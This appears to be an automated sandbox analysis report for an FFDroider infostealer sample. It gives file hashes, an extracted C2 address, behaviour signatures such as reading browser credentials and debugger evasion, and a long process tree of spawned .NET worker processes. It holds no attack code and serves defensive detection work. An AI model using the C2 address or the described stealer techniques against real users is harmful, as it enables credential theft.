Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/12/2024, 02:03 UTC

General

  • Target

    dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe

  • Size

    4.3MB

  • MD5

    3aa667aff44754cd87a6eb4cb347a91b

  • SHA1

    1013d521a4b5f6a5e1a39773c0cdb9364a0ae618

  • SHA256

    dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

  • SHA512

    a392b44659e052edf0b027648eea2b69a6043c1eb4bdc4f38c1310dfb86c0f8e950329a7e89ace02f1c331189786c0adb0eec328dba4ac62aca595922c3e6238

  • SSDEEP

    98304:iL5LNYSnH/qy3N5MFRa1wR+ByBQJTWCsizJHaDi6FkEXV9D527BWG:iLxLHI21wR3BQTWdaJHPyfDVQBWG

Malware Config

Extracted

Family

ffdroider

C2

http://186.2.171.17

Signatures

  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 6 IoCs
  • Ffdroider family
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
    "C:\Users\Admin\AppData\Local\Temp\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    PID:840
  • C:\Windows\System32\alg.exe
    C:\Windows\System32\alg.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    PID:780
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    1⤵
    • Executes dropped EXE
    PID:2312
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    PID:2824
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in Windows directory
    PID:2692
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 1d4 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1696
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 1d4 -NGENProcess 1d8 -Pipe 1e8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1704
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 25c -NGENProcess 24c -Pipe 248 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2572
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 254 -NGENProcess 258 -Pipe 23c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2256
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 264 -NGENProcess 244 -Pipe 1d4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2708
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 1d8 -NGENProcess 258 -Pipe 24c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3020
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 1d8 -NGENProcess 264 -Pipe 254 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:584
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 26c -NGENProcess 258 -Pipe 270 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:660
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 268 -NGENProcess 274 -Pipe 1d8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1472
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 274 -NGENProcess 25c -Pipe 278 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1560
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 244 -NGENProcess 260 -Pipe 1f0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:876
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 268 -NGENProcess 280 -Pipe 274 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2812
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 250 -NGENProcess 284 -Pipe 27c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2600
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 258 -NGENProcess 280 -Pipe 26c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3028
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 288 -NGENProcess 268 -Pipe 25c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3040
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 28c -NGENProcess 284 -Pipe 240 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2488
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 290 -NGENProcess 280 -Pipe 260 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:3020
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 298 -NGENProcess 268 -Pipe 294 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2452
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2a0 -NGENProcess 244 -Pipe 29c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2992
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 250 -NGENProcess 244 -Pipe 290 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2316
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 284 -NGENProcess 298 -Pipe 258 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1560
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 2a4 -NGENProcess 2a8 -Pipe 250 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2516
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 264 -NGENProcess 298 -Pipe 288 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2104
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 1c4 -NGENProcess 21c -Pipe 2ac -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2868
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 2d4 -NGENProcess 264 -Pipe 2d0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:236
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2d8 -NGENProcess 2c4 -Pipe 2cc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1220
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2c4 -NGENProcess 284 -Pipe 2e0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2320
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 2c0 -NGENProcess 2dc -Pipe 2a4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2168
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 284 -NGENProcess 2dc -Pipe 1c4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2368
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 2ec -NGENProcess 2e4 -Pipe 2e8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2192
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 2e4 -NGENProcess 2c0 -Pipe 2c8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1848
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2e4 -InterruptEvent 2f4 -NGENProcess 2dc -Pipe 2d4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2728
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 2dc -NGENProcess 2ec -Pipe 2f0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1540
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 2fc -NGENProcess 2c0 -Pipe 284 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2948
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 2c0 -NGENProcess 2f4 -Pipe 2f8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1048
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 304 -NGENProcess 2ec -Pipe 2e4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1456
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 2ec -NGENProcess 2fc -Pipe 300 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2536
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 30c -NGENProcess 2f4 -Pipe 2dc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:1736
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 2f4 -NGENProcess 304 -Pipe 308 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2352
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 314 -NGENProcess 2fc -Pipe 2c0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:3028
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 2fc -NGENProcess 30c -Pipe 310 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1744
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 31c -NGENProcess 304 -Pipe 2ec -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:1988
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 304 -NGENProcess 314 -Pipe 318 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2904
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 324 -NGENProcess 30c -Pipe 2f4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:1812
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 324 -InterruptEvent 30c -NGENProcess 31c -Pipe 320 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2728
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 32c -NGENProcess 314 -Pipe 2fc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:580
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 314 -NGENProcess 324 -Pipe 328 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:920
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 334 -NGENProcess 31c -Pipe 304 -Comment "NGen Worker Process"
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 31c -NGENProcess 32c -Pipe 330 -Comment "NGen Worker Process"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2636
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 33c -NGENProcess 324 -Pipe 30c -Comment "NGen Worker Process"
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2828
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 324 -NGENProcess 334 -Pipe 338 -Comment "NGen Worker Process"
      2⤵
        PID:2516
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 324 -InterruptEvent 344 -NGENProcess 32c -Pipe 314 -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:2332
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 32c -NGENProcess 33c -Pipe 340 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2232
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 34c -NGENProcess 334 -Pipe 31c -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:1716
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 34c -InterruptEvent 334 -NGENProcess 344 -Pipe 348 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1396
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 354 -NGENProcess 33c -Pipe 324 -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:1372
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 354 -InterruptEvent 33c -NGENProcess 34c -Pipe 350 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1748
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 35c -NGENProcess 344 -Pipe 32c -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:392
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 33c -NGENProcess 358 -Pipe 264 -Comment "NGen Worker Process"
        2⤵
        • Modifies data under HKEY_USERS
        PID:2580
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 2d8 -NGENProcess 360 -Pipe 334 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2828
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 368 -NGENProcess 344 -Pipe 21c -Comment "NGen Worker Process"
        2⤵
          PID:2108
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 368 -InterruptEvent 36c -NGENProcess 358 -Pipe 354 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1996
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 358 -NGENProcess 33c -Pipe 374 -Comment "NGen Worker Process"
          2⤵
          • Loads dropped DLL
          • Drops file in Windows directory
          PID:2276
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 33c -NGENProcess 2d8 -Pipe 370 -Comment "NGen Worker Process"
          2⤵
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          PID:2876
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 2d8 -NGENProcess 35c -Pipe 368 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2584
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 37c -InterruptEvent 2d8 -NGENProcess 33c -Pipe 364 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1640
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 360 -NGENProcess 35c -Pipe 36c -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:1224
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 360 -InterruptEvent 384 -NGENProcess 34c -Pipe 344 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2948
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 388 -NGENProcess 33c -Pipe 380 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2976
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 388 -InterruptEvent 38c -NGENProcess 35c -Pipe 358 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2060
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 390 -NGENProcess 34c -Pipe 37c -Comment "NGen Worker Process"
          2⤵
            PID:2552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 390 -InterruptEvent 394 -NGENProcess 33c -Pipe 2d8 -Comment "NGen Worker Process"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2124
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 394 -InterruptEvent 398 -NGENProcess 35c -Pipe 360 -Comment "NGen Worker Process"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2320
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 39c -NGENProcess 34c -Pipe 384 -Comment "NGen Worker Process"
            2⤵
              PID:316
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 39c -InterruptEvent 3a0 -NGENProcess 33c -Pipe 388 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2960
